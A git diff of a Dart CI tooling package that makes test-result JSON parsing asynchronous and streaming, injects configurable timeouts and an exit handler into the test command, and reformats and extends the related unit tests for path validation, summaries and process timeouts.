b/docs/cli/API_REFERENCE.md @@ -292,7 +292,7 @@ if (isGitInstalled) { - Parsed aggregate test results. - Fields: `passed`, `failed`, `skipped`, `totalDurationMs`, `failures`, `parsed`. - **TestResultsUtil** - - `parseTestResultsJson(String jsonPath)`: `static TestResults` + - `parseTestResultsJson(String jsonPath)`: `static Future` - `writeTestJobSummary(TestResults results, int exitCode, {String? platformId, void Function(String markdown)? 
writeSummary})`: `static void` - **Utf8BoundedBuffer** - `Utf8BoundedBuffer({required int maxBytes, required String truncationSuffix})` diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index 00df5c1..ccd198c 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -14,6 +14,8 @@ import '../utils/test_results_util.dart'; import '../utils/sub_package_utils.dart'; import '../utils/utf8_bounded_buffer.dart'; +typedef _ExitHandler = Future<void> Function(int code); + /// Run `dart test` on the root package and all configured sub-packages with /// full output capture (two-layer strategy). /// @@ -49,14 +51,18 @@ class TestCommand extends Command { /// Run tests with an explicit [repoRoot], preserving the contract from /// manage_cicd when invoked as `manage_cicd test` (CWD may differ from root). - static Future<void> runWithRoot(String repoRoot) async { + static Future<void> runWithRoot( + String repoRoot, { + Duration processTimeout = const Duration(minutes: 45), + Duration pubGetTimeout = const Duration(minutes: 5), + _ExitHandler exitHandler = exitWithCode, + }) async { Logger.header('Running dart test'); - const processTimeout = Duration(minutes: 45); final failures = <String>[]; // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = await _resolveLogDirOrExit(repoRoot); + final logDir = await _resolveLogDirOrExit(repoRoot, exitHandler); Logger.info('Log directory: $logDir'); final jsonPath = p.join(logDir, 'results.json'); @@ -141,7 +147,7 @@ class TestCommand extends Command { } // Parse the JSON results file for structured test data - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); // Generate and write the rich job summary TestResultsUtil.writeTestJobSummary(results, exitCode); @@ -186,7 +192,6 @@ class TestCommand extends Command { // Ensure dependencies are resolved 
(sub-packages have independent // pubspec.yaml files that the root `dart pub get` may not cover). // Use Process.start so we can kill on timeout (Process.run would hang). - const pubGetTimeout = Duration(minutes: 5); final pubGetResult = await _runPubGetWithTimeout( dir, pubGetTimeout, @@ -278,7 +283,7 @@ class TestCommand extends Command { Logger.warn('Could not write sub-package log files: $e'); } - final spResults = TestResultsUtil.parseTestResultsJson(spJsonPath); + final spResults = await TestResultsUtil.parseTestResultsJson(spJsonPath); TestResultsUtil.writeTestJobSummary(spResults, spExitCode, platformId: name); if (spExitCode != 0) { @@ -293,7 +298,7 @@ class TestCommand extends Command { Logger.error('Tests failed for ${failures.length} package(s): ${failures.join(', ')}'); final failureBullets = failures.map((name) => '- `${StepSummary.escapeHtml(name)}`').join('\n'); StepSummary.write('\n## Sub-package Test Failures\n\n$failureBullets\n'); - await exitWithCode(1); + await exitHandler(1); } Logger.success('All tests passed'); @@ -375,17 +380,17 @@ class TestCommand extends Command { return -1; } - static Future<String> _resolveLogDirOrExit(String repoRoot) async { + static Future<String> _resolveLogDirOrExit(String repoRoot, _ExitHandler exitHandler) async { try { final logDir = RepoUtils.resolveTestLogDir(repoRoot); RepoUtils.ensureSafeDirectory(logDir); return logDir; } on StateError catch (e) { Logger.error('$e'); - await exitWithCode(1); + await exitHandler(1); } on FileSystemException catch (e) { Logger.error('Cannot use log directory: $e'); - await exitWithCode(1); + await exitHandler(1); } } } diff --git a/lib/src/cli/utils/test_results_util.dart b/lib/src/cli/utils/test_results_util.dart index 3b91503..63ae36f 100644 --- a/lib/src/cli/utils/test_results_util.dart +++ b/lib/src/cli/utils/test_results_util.dart @@ -39,7 +39,10 @@ const int _maxStoredPrintChars = 6000; /// Test-results parsing and step-summary writing for CI. 
abstract final class TestResultsUtil { /// Parse the NDJSON file produced by `dart test --file-reporter json:...`. - static TestResults parseTestResultsJson(String jsonPath) { + /// + /// Uses streaming line-by-line parsing to avoid loading very large result + /// files fully into memory. + static Future parseTestResultsJson(String jsonPath) async { final results = TestResults(); final file = File(jsonPath); if (!file.existsSync()) { @@ -56,95 +59,101 @@ abstract final class TestResultsUtil { const _maxMalformedWarnings = 5; var malformedCount = 0; - final lines = file.readAsLinesSync(); - for (final line in lines) { - if (line.trim().isEmpty) continue; - try { - final event = jsonDecode(line) as Map; - final type = event['type'] as String?; - - switch (type) { - case 'testStart': - final test = event['test'] as Map?; - if (test == null) break; - final id = test['id'] as int?; - if (id == null) break; - testNames[id] = test['name'] as String? ?? 'unknown'; - testStartTimes[id] = event['time'] as int? ?? 0; - results.parsed = true; - - case 'testDone': - final id = event['testID'] as int?; - if (id == null) break; - final resultStr = event['result'] as String?; - final hidden = event['hidden'] as bool? ?? false; - final skipped = event['skipped'] as bool? ?? false; - - if (hidden) break; - - results.parsed = true; - if (skipped) { - results.skipped++; - } else if (resultStr == 'success') { - results.passed++; - } else if (resultStr == 'failure' || resultStr == 'error') { - results.failed++; - if (results.failures.length < 50) { - final startTime = testStartTimes[id] ?? 0; - final endTime = event['time'] as int? ?? 0; - final rawError = testErrors[id]?.toString() ?? ''; - final rawStack = testStackTraces[id]?.toString() ?? ''; - final rawPrint = testPrints[id]?.toString() ?? ''; - results.failures.add( - TestFailure( - name: testNames[id] ?? 'unknown', - error: rawError.length > _maxStoredErrorChars - ? '${rawError.substring(0, _maxStoredErrorChars)}\n... 
(truncated)' - : rawError, - stackTrace: rawStack.length > _maxStoredStackTraceChars - ? '${rawStack.substring(0, _maxStoredStackTraceChars)}\n... (truncated)' - : rawStack, - printOutput: rawPrint.length > _maxStoredPrintChars - ? '${rawPrint.substring(0, _maxStoredPrintChars)}\n... (truncated)' - : rawPrint, - durationMs: endTime - startTime, - ), - ); + try { + final lines = file.openRead().transform(const Utf8Decoder(allowMalformed: true)).transform(const LineSplitter()); + + await for (final line in lines) { + if (line.trim().isEmpty) continue; + try { + final event = jsonDecode(line) as Map; + final type = event['type'] as String?; + + switch (type) { + case 'testStart': + final test = event['test'] as Map?; + if (test == null) break; + final id = test['id'] as int?; + if (id == null) break; + testNames[id] = test['name'] as String? ?? 'unknown'; + testStartTimes[id] = event['time'] as int? ?? 0; + results.parsed = true; + + case 'testDone': + final id = event['testID'] as int?; + if (id == null) break; + final resultStr = event['result'] as String?; + final hidden = event['hidden'] as bool? ?? false; + final skipped = event['skipped'] as bool? ?? false; + + if (hidden) break; + + results.parsed = true; + if (skipped) { + results.skipped++; + } else if (resultStr == 'success') { + results.passed++; + } else if (resultStr == 'failure' || resultStr == 'error') { + results.failed++; + if (results.failures.length < 50) { + final startTime = testStartTimes[id] ?? 0; + final endTime = event['time'] as int? ?? 0; + final rawError = testErrors[id]?.toString() ?? ''; + final rawStack = testStackTraces[id]?.toString() ?? ''; + final rawPrint = testPrints[id]?.toString() ?? ''; + results.failures.add( + TestFailure( + name: testNames[id] ?? 'unknown', + error: rawError.length > _maxStoredErrorChars + ? '${rawError.substring(0, _maxStoredErrorChars)}\n... (truncated)' + : rawError, + stackTrace: rawStack.length > _maxStoredStackTraceChars + ? 
'${rawStack.substring(0, _maxStoredStackTraceChars)}\n... (truncated)' + : rawStack, + printOutput: rawPrint.length > _maxStoredPrintChars + ? '${rawPrint.substring(0, _maxStoredPrintChars)}\n... (truncated)' + : rawPrint, + durationMs: endTime - startTime, + ), + ); + } } - } - - case 'error': - results.parsed = true; - final id = event['testID'] as int?; - if (id == null) break; - testErrors.putIfAbsent(id, () => StringBuffer()); - if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); - testErrors[id]!.write(event['error'] as String? ?? ''); - testStackTraces.putIfAbsent(id, () => StringBuffer()); - if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); - testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); - - case 'print': - results.parsed = true; - final id = event['testID'] as int?; - if (id == null) break; - final message = event['message'] as String? ?? ''; - testPrints.putIfAbsent(id, () => StringBuffer()); - testPrints[id]!.writeln(message); - - case 'done': - results.parsed = true; - final time = event['time'] as int? ?? 0; - results.totalDurationMs = time; - } - } catch (e) { - malformedCount++; - if (malformedCount <= _maxMalformedWarnings) { - Logger.warn('Skipping malformed JSON line: $e'); - } else if (malformedCount == _maxMalformedWarnings + 1) { - Logger.warn('Skipping malformed JSON lines (circuit breaker — suppressing further warnings)'); + + case 'error': + results.parsed = true; + final id = event['testID'] as int?; + if (id == null) break; + testErrors.putIfAbsent(id, () => StringBuffer()); + if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); + testErrors[id]!.write(event['error'] as String? ?? ''); + testStackTraces.putIfAbsent(id, () => StringBuffer()); + if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); + testStackTraces[id]!.write(event['stackTrace'] as String? ?? 
''); + + case 'print': + results.parsed = true; + final id = event['testID'] as int?; + if (id == null) break; + final message = event['message'] as String? ?? ''; + testPrints.putIfAbsent(id, () => StringBuffer()); + testPrints[id]!.writeln(message); + + case 'done': + results.parsed = true; + final time = event['time'] as int? ?? 0; + results.totalDurationMs = time; + } + } catch (e) { + malformedCount++; + if (malformedCount <= _maxMalformedWarnings) { + Logger.warn('Skipping malformed JSON line: $e'); + } else if (malformedCount == _maxMalformedWarnings + 1) { + Logger.warn('Skipping malformed JSON lines (circuit breaker — suppressing further warnings)'); + } } } + } on FileSystemException catch (e) { + Logger.warn('Failed reading JSON results file at $jsonPath: $e'); + return results; } if (malformedCount > _maxMalformedWarnings) { diff --git a/test/cli_utils_test.dart b/test/cli_utils_test.dart index 9727e86..bab5f1c 100644 --- a/test/cli_utils_test.dart +++ b/test/cli_utils_test.dart @@ -47,7 +47,10 @@ void main() { }); test('returns default path when TEST_LOG_DIR is unset', () { - final resolved = RepoUtils.resolveTestLogDir(repoRoot, environment: const {}); + final resolved = RepoUtils.resolveTestLogDir( + repoRoot, + environment: const {}, + ); expect(resolved, equals(p.join(repoRoot, '.dart_tool', 'test-logs'))); }); @@ -71,8 +74,10 @@ void main() { test('throws when TEST_LOG_DIR is relative', () { expect( - () => - RepoUtils.resolveTestLogDir(repoRoot, environment: const {'TEST_LOG_DIR': 'relative/path'}), + () => RepoUtils.resolveTestLogDir( + repoRoot, + environment: const {'TEST_LOG_DIR': 'relative/path'}, + ), throwsA(isA()), ); }); @@ -81,7 +86,10 @@ void main() { final runnerTemp = p.join(repoRoot, 'runner-temp'); final outside = p.join(repoRoot, 'outside', 'logs'); expect( - () => RepoUtils.resolveTestLogDir(repoRoot, environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}), + () => RepoUtils.resolveTestLogDir( + repoRoot, + 
environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}, + ), throwsA(isA()), ); }); @@ -101,7 +109,10 @@ void main() { expect( () => RepoUtils.resolveTestLogDir( repoRoot, - environment: {'RUNNER_TEMP': '/tmp/runner\nbad', 'TEST_LOG_DIR': inside}, + environment: { + 'RUNNER_TEMP': '/tmp/runner\nbad', + 'TEST_LOG_DIR': inside, + }, ), throwsA(isA()), ); @@ -141,19 +152,35 @@ void main() { expect(File(filePath).readAsStringSync(), equals('hello world')); }); - test('ensureSafeDirectory rejects symlink-backed directories', skip: !symlinksSupported, () { - final targetDir = Directory(p.join(tempDir.path, 'target'))..createSync(recursive: true); - final linkDirPath = p.join(tempDir.path, 'linked'); - Link(linkDirPath).createSync(targetDir.path); - expect(() => RepoUtils.ensureSafeDirectory(linkDirPath), throwsA(isA())); - }); - - test('writeFileSafely rejects symlink file targets', skip: !symlinksSupported, () { - final targetFile = File(p.join(tempDir.path, 'target.txt'))..writeAsStringSync('base'); - final linkPath = p.join(tempDir.path, 'linked.txt'); - Link(linkPath).createSync(targetFile.path); - expect(() => RepoUtils.writeFileSafely(linkPath, 'new content'), throwsA(isA())); - }); + test( + 'ensureSafeDirectory rejects symlink-backed directories', + skip: !symlinksSupported, + () { + final targetDir = Directory(p.join(tempDir.path, 'target')) + ..createSync(recursive: true); + final linkDirPath = p.join(tempDir.path, 'linked'); + Link(linkDirPath).createSync(targetDir.path); + expect( + () => RepoUtils.ensureSafeDirectory(linkDirPath), + throwsA(isA()), + ); + }, + ); + + test( + 'writeFileSafely rejects symlink file targets', + skip: !symlinksSupported, + () { + final targetFile = File(p.join(tempDir.path, 'target.txt')) + ..writeAsStringSync('base'); + final linkPath = p.join(tempDir.path, 'linked.txt'); + Link(linkPath).createSync(targetFile.path); + expect( + () => RepoUtils.writeFileSafely(linkPath, 'new content'), + throwsA(isA()), + ); + }, + ); 
}); group('TestResultsUtil.parseTestResultsJson', () { @@ -169,9 +196,9 @@ void main() { } }); - test('returns unparsed empty results when file does not exist', () { + test('returns unparsed empty results when file does not exist', () async { final missingPath = p.join(tempDir.path, 'missing.json'); - final results = TestResultsUtil.parseTestResultsJson(missingPath); + final results = await TestResultsUtil.parseTestResultsJson(missingPath); expect(results.parsed, isFalse); expect(results.passed, equals(0)); expect(results.failed, equals(0)); @@ -179,32 +206,10 @@ void main() { expect(results.failures, isEmpty); }); - test('returns unparsed results when NDJSON file is empty', () { + test('returns unparsed results when NDJSON file is empty', () async { final jsonPath = p.join(tempDir.path, 'empty.json'); File(jsonPath).writeAsStringSync(''); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isFalse); - expect(results.passed, equals(0)); - expect(results.failed, equals(0)); - expect(results.skipped, equals(0)); - expect(results.failures, isEmpty); - }); - - test('returns unparsed results when NDJSON file has only blank lines', () { - final jsonPath = p.join(tempDir.path, 'blank.json'); - File(jsonPath).writeAsStringSync('\n \n\t\n'); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isFalse); - expect(results.passed, equals(0)); - expect(results.failed, equals(0)); - expect(results.skipped, equals(0)); - expect(results.failures, isEmpty); - }); - - test('returns unparsed results when file has valid JSON but no structured events', () { - final jsonPath = p.join(tempDir.path, 'no_events.json'); - File(jsonPath).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); expect(results.parsed, isFalse); expect(results.passed, equals(0)); 
expect(results.failed, equals(0)); @@ -212,7 +217,37 @@ void main() { expect(results.failures, isEmpty); }); - test('parses pass/fail/skipped counts and failure details', () { + test( + 'returns unparsed results when NDJSON file has only blank lines', + () async { + final jsonPath = p.join(tempDir.path, 'blank.json'); + File(jsonPath).writeAsStringSync('\n \n\t\n'); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isFalse); + expect(results.passed, equals(0)); + expect(results.failed, equals(0)); + expect(results.skipped, equals(0)); + expect(results.failures, isEmpty); + }, + ); + + test( + 'returns unparsed results when file has valid JSON but no structured events', + () async { + final jsonPath = p.join(tempDir.path, 'no_events.json'); + File( + jsonPath, + ).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isFalse); + expect(results.passed, equals(0)); + expect(results.failed, equals(0)); + expect(results.skipped, equals(0)); + expect(results.failures, isEmpty); + }, + ); + + test('parses pass/fail/skipped counts and failure details', () async { final jsonPath = p.join(tempDir.path, 'results.json'); File(jsonPath).writeAsStringSync( [ @@ -228,7 +263,7 @@ void main() { ].join('\n'), ); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); expect(results.parsed, isTrue); expect(results.passed, equals(1)); expect(results.failed, equals(1)); @@ -242,7 +277,7 @@ void main() { expect(results.failures.first.durationMs, equals(40)); }); - test('caps failures list at 50 to prevent unbounded growth', () { + test('caps failures list at 50 to prevent unbounded growth', () async { final lines = []; for (var i = 0; i < 60; i++) { lines.addAll([ @@ -254,12 +289,12 @@ void main() { final jsonPath = p.join(tempDir.path, 
'many_failures.json'); File(jsonPath).writeAsStringSync(lines.join('\n')); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); expect(results.failed, equals(60)); expect(results.failures.length, lessThanOrEqualTo(50)); }); - test('counts testDone with result \"error\" as a failure', () { + test('counts testDone with result \"error\" as a failure', () async { final jsonPath = p.join(tempDir.path, 'error_result.json'); File(jsonPath).writeAsStringSync( [ @@ -270,14 +305,14 @@ void main() { ].join('\n'), ); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); expect(results.parsed, isTrue); expect(results.failed, equals(1)); expect(results.failures, hasLength(1)); expect(results.failures.first.name, equals('errored')); }); - test('ignores malformed JSON lines and hidden test entries', () { + test('ignores malformed JSON lines and hidden test entries', () async { final jsonPath = p.join(tempDir.path, 'results.json'); File(jsonPath).writeAsStringSync( [ @@ -291,14 +326,14 @@ void main() { ].join('\n'), ); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); expect(results.parsed, isTrue); expect(results.passed, equals(1)); expect(results.failed, equals(0)); expect(results.failures, isEmpty); }); - test('malformed JSON circuit breaker limits warning flood', () { + test('malformed JSON circuit breaker limits warning flood', () async { final jsonPath = p.join(tempDir.path, 'flood.json'); final lines = [ '{"type":"testStart","test":{"id":1,"name":"ok"},"time":0}', @@ -308,12 +343,12 @@ void main() { ]; File(jsonPath).writeAsStringSync(lines.join('\n')); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); expect(results.parsed, isTrue); 
expect(results.passed, equals(1)); }); - test('truncates stored failure details to prevent unbounded growth', () { + test('truncates stored failure details to prevent unbounded growth', () async { final longError = 'x' * 12000; final longStack = 'y' * 10000; final longPrint = 'z' * 8000; @@ -328,7 +363,7 @@ void main() { ].join('\n'), ); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); expect(results.failures, hasLength(1)); expect(results.failures.first.error.length, lessThan(10000)); expect(results.failures.first.error, contains('(truncated)')); @@ -340,7 +375,12 @@ void main() { }); group('TestResultsUtil.writeTestJobSummary', () { - TestResults _parsed({required int passed, required int failed, required int skipped, int durationMs = 500}) { + TestResults _parsed({ + required int passed, + required int failed, + required int skipped, + int durationMs = 500, + }) { final results = TestResults() ..parsed = true ..passed = passed @@ -350,39 +390,50 @@ void main() { return results; } - test('emits NOTE when parsed results are successful and exit code is 0', () { - String? summary; - final results = _parsed(passed: 3, failed: 0, skipped: 1); - - TestResultsUtil.writeTestJobSummary( - results, - 0, - platformId: 'linux-x64', - writeSummary: (markdown) => summary = markdown, - ); - - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux-x64')); - expect(summary!, contains('> [!NOTE]')); - expect(summary!, contains('All 4 tests passed')); - }); - - test('emits CAUTION when exit code is non-zero even if failed count is zero', () { - String? summary; - final results = _parsed(passed: 2, failed: 0, skipped: 0); + test( + 'emits NOTE when parsed results are successful and exit code is 0', + () { + String? 
summary; + final results = _parsed(passed: 3, failed: 0, skipped: 1); + + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'linux-x64', + writeSummary: (markdown) => summary = markdown, + ); - TestResultsUtil.writeTestJobSummary( - results, - 1, - platformId: 'linux ', - writeSummary: (markdown) => summary = markdown, - ); + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux-x64')); + expect(summary!, contains('> [!NOTE]')); + expect(summary!, contains('All 4 tests passed')); + }, + ); + + test( + 'emits CAUTION when exit code is non-zero even if failed count is zero', + () { + String? summary; + final results = _parsed(passed: 2, failed: 0, skipped: 0); + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux ', + writeSummary: (markdown) => summary = markdown, + ); - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux <x64>')); - expect(summary!, contains('> [!CAUTION]')); - expect(summary!, contains('Tests exited with code 1 despite no structured test failures.')); - }); + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux <x64>')); + expect(summary!, contains('> [!CAUTION]')); + expect( + summary!, + contains( + 'Tests exited with code 1 despite no structured test failures.', + ), + ); + }, + ); test('emits CAUTION for unparsed results with non-zero exit code', () { String? 
summary; @@ -397,7 +448,12 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!CAUTION]')); - expect(summary!, contains('Tests failed (exit code 7) — no structured results available.')); + expect( + summary!, + contains( + 'Tests failed (exit code 7) — no structured results available.', + ), + ); }); test('emits NOTE for unparsed results with zero exit code', () { @@ -413,14 +469,25 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!NOTE]')); - expect(summary!, contains('Tests passed (exit code 0) — no structured results available.')); + expect( + summary!, + contains( + 'Tests passed (exit code 0) — no structured results available.', + ), + ); }); test('emits CAUTION when parsed results contain failures', () { String? summary; final results = _parsed(passed: 1, failed: 1, skipped: 0); results.failures.add( - TestFailure(name: 'failing test', error: 'boom', stackTrace: 'trace', printOutput: '', durationMs: 12), + TestFailure( + name: 'failing test', + error: 'boom', + stackTrace: 'trace', + printOutput: '', + durationMs: 12, + ), ); TestResultsUtil.writeTestJobSummary( @@ -460,7 +527,12 @@ void main() { ); expect(summary, isNotNull); - expect(summary!, contains('_...and 5 more failures. See test logs artifact for full details._')); + expect( + summary!, + contains( + '_...and 5 more failures. 
See test logs artifact for full details._', + ), + ); expect(summary!, isNot(contains('failing test 24'))); }); @@ -520,7 +592,10 @@ void main() { group('Utf8BoundedBuffer', () { test('appends full content when under byte limit', () { - final buffer = Utf8BoundedBuffer(maxBytes: 20, truncationSuffix: '...[truncated]'); + final buffer = Utf8BoundedBuffer( + maxBytes: 20, + truncationSuffix: '...[truncated]', + ); buffer.append('hello'); buffer.append(' world'); expect(buffer.isTruncated, isFalse); @@ -537,12 +612,18 @@ void main() { expect(buffer.byteLength, equals(9)); }); - test('never exceeds maxBytes even when suffix is longer than remaining budget', () { - final buffer = Utf8BoundedBuffer(maxBytes: 4, truncationSuffix: '...[truncated]'); - buffer.append('abcdefgh'); - expect(buffer.isTruncated, isTrue); - expect(utf8.encode(buffer.toString()).length, lessThanOrEqualTo(4)); - }); + test( + 'never exceeds maxBytes even when suffix is longer than remaining budget', + () { + final buffer = Utf8BoundedBuffer( + maxBytes: 4, + truncationSuffix: '...[truncated]', + ); + buffer.append('abcdefgh'); + expect(buffer.isTruncated, isTrue); + expect(utf8.encode(buffer.toString()).length, lessThanOrEqualTo(4)); + }, + ); }); group('StepSummary', () { @@ -559,7 +640,10 @@ void main() { File(summaryPath).writeAsStringSync('x' * (maxBytes - 2)); expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); - StepSummary.write('語', environment: {'GITHUB_STEP_SUMMARY': summaryPath}); + StepSummary.write( + '語', + environment: {'GITHUB_STEP_SUMMARY': summaryPath}, + ); // Should skip append (would exceed); file size unchanged expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); } finally { @@ -595,7 +679,9 @@ void main() { void _writeConfig(Map ci) { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File('${configDir.path}/config.json').writeAsStringSync(json.encode({'ci': ci})); + File( + '${configDir.path}/config.json', + 
).writeAsStringSync(json.encode({'ci': ci})); } test('returns empty when no sub_packages', () { @@ -685,35 +771,55 @@ void main() { }); group('CiProcessRunner.exec', () { - test('fatal path exits with process exit code after flushing stdout/stderr', () async { - final scriptPath = p.join(p.current, 'test', 'scripts', 'fatal_exit_probe.dart'); - final result = Process.runSync(Platform.resolvedExecutable, ['run', scriptPath], runInShell: false); - final expectedCode = Platform.isWindows ? 7 : 1; - expect(result.exitCode, equals(expectedCode), reason: 'fatal exec should exit with failing command exit code'); - }); + test( + 'fatal path exits with process exit code after flushing stdout/stderr', + () async { + final scriptPath = p.join( + p.current, + 'test', + 'scripts', + 'fatal_exit_probe.dart', + ); + final result = Process.runSync(Platform.resolvedExecutable, [ + 'run', + scriptPath, + ], runInShell: false); + final expectedCode = Platform.isWindows ? 7 : 1; + expect( + result.exitCode, + equals(expectedCode), + reason: 'fatal exec should exit with failing command exit code', + ); + }, + ); }); group('CiProcessRunner.runWithTimeout', () { test('completes normally when process finishes within timeout', () async { - final result = await CiProcessRunner.runWithTimeout(Platform.resolvedExecutable, [ - '--version', - ], timeout: const Duration(seconds: 10)); + final result = await CiProcessRunner.runWithTimeout( + Platform.resolvedExecutable, + ['--version'], + timeout: const Duration(seconds: 10), + ); expect(result.exitCode, equals(0)); expect(result.stdout, contains('Dart')); }); - test('returns timeout result and kills process when timeout exceeded', () async { - final executable = Platform.isWindows ? 'ping' : 'sleep'; - final args = Platform.isWindows ? 
['127.0.0.1', '-n', '60'] : ['60']; - final result = await CiProcessRunner.runWithTimeout( - executable, - args, - timeout: const Duration(milliseconds: 500), - timeoutExitCode: 124, - timeoutMessage: 'Timed out', - ); - expect(result.exitCode, equals(124)); - expect(result.stderr, equals('Timed out')); - }); + test( + 'returns timeout result and kills process when timeout exceeded', + () async { + final executable = Platform.isWindows ? 'ping' : 'sleep'; + final args = Platform.isWindows ? ['127.0.0.1', '-n', '60'] : ['60']; + final result = await CiProcessRunner.runWithTimeout( + executable, + args, + timeout: const Duration(milliseconds: 500), + timeoutExitCode: 124, + timeoutMessage: 'Timed out', + ); + expect(result.exitCode, equals(124)); + expect(result.stderr, equals('Timed out')); + }, + ); }); } diff --git a/test/test_command_test.dart b/test/test_command_test.dart index 9a0ab1c..eb50d93 100644 --- a/test/test_command_test.dart +++ b/test/test_command_test.dart @@ -1,4 +1,5 @@ import 'dart:io'; +import 'dart:convert'; import 'package:path/path.dart' as p; import 'package:test/test.dart'; @@ -7,6 +8,15 @@ import 'package:runtime_ci_tooling/src/cli/commands/test_command.dart'; import 'package:runtime_ci_tooling/src/cli/utils/test_results_util.dart'; import 'package:runtime_ci_tooling/src/triage/utils/config.dart'; +class _TestExit implements Exception { + final int code; + _TestExit(this.code); +} + +Future _throwingExit(int code) async { + throw _TestExit(code); +} + void main() { group('TestCommand.runWithRoot', () { late Directory tempDir; @@ -21,18 +31,42 @@ void main() { } }); - test('skips root tests and succeeds when no test/ directory exists', () async { - // Minimal repo: pubspec with matching name, no test/ - File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync('name: ${config.repoName}\nversion: 0.0.0\n'); - - // Completes without throwing or exit(1); StepSummary.write is no-op when - // GITHUB_STEP_SUMMARY is unset (local runs). 
- await TestCommand.runWithRoot(tempDir.path); - }); + void writeRootPubspec({bool includeTest = false}) { + final deps = includeTest ? 'dev_dependencies:\n test: ^1.24.0\n' : ''; + File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync( + 'name: ${config.repoName}\nversion: 0.0.0\nenvironment:\n sdk: ^3.0.0\n$deps', + ); + } + + void writeSubPackageConfig(List> subPackages) { + final configDir = Directory(p.join(tempDir.path, '.runtime_ci')) + ..createSync(recursive: true); + File(p.join(configDir.path, 'config.json')).writeAsStringSync( + jsonEncode({ + 'ci': { + 'dart_sdk': '3.9.2', + 'features': {'proto': false, 'lfs': false}, + 'sub_packages': subPackages, + }, + }), + ); + } + + test( + 'skips root tests and succeeds when no test/ directory exists', + () async { + // Minimal repo: pubspec with matching name, no test/ + writeRootPubspec(); + + // Completes without throwing or exit(1); StepSummary.write is no-op when + // GITHUB_STEP_SUMMARY is unset (local runs). + await TestCommand.runWithRoot(tempDir.path); + }, + ); test('uses passed repoRoot for log directory resolution', () async { // Create minimal repo - File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync('name: ${config.repoName}\nversion: 0.0.0\n'); + writeRootPubspec(); await TestCommand.runWithRoot(tempDir.path); @@ -41,57 +75,145 @@ void main() { expect(Directory(expectedLogDir).existsSync(), isTrue); }); - test('runs root tests, writes results.json, and StepSummary pathway produces valid output', () async { - // Minimal repo with a passing test to exercise full TestCommand flow - File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync(''' -name: ${config.repoName} + test( + 'runs root tests, writes results.json, and StepSummary pathway produces valid output', + () async { + // Minimal repo with a passing test to exercise full TestCommand flow + writeRootPubspec(includeTest: true); + Directory(p.join(tempDir.path, 'test')).createSync(recursive: true); + File( + 
p.join(tempDir.path, 'test', 'passing_test.dart'), + ).writeAsStringSync(''' +import 'package:test/test.dart'; + +void main() { + test('passes', () => expect(1 + 1, equals(2))); +} +'''); + // Resolve dependencies so dart test can run + final pubGet = await Process.run('dart', [ + 'pub', + 'get', + ], workingDirectory: tempDir.path); + expect(pubGet.exitCode, equals(0), reason: 'dart pub get must succeed'); + + await TestCommand.runWithRoot(tempDir.path); + + final logDir = p.join(tempDir.path, '.dart_tool', 'test-logs'); + expect( + Directory(logDir).existsSync(), + isTrue, + reason: 'log dir should be created', + ); + + // results.json or expanded.txt are written by file reporters + final jsonPath = p.join(logDir, 'results.json'); + final expandedPath = p.join(logDir, 'expanded.txt'); + final hasResults = + File(jsonPath).existsSync() || File(expandedPath).existsSync(); + expect( + hasResults, + isTrue, + reason: 'at least one reporter output should exist', + ); + + // If results.json exists, verify parse + writeTestJobSummary pathway + if (File(jsonPath).existsSync()) { + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isTrue); + expect(results.passed, greaterThanOrEqualTo(1)); + expect(results.failed, equals(0)); + + String? 
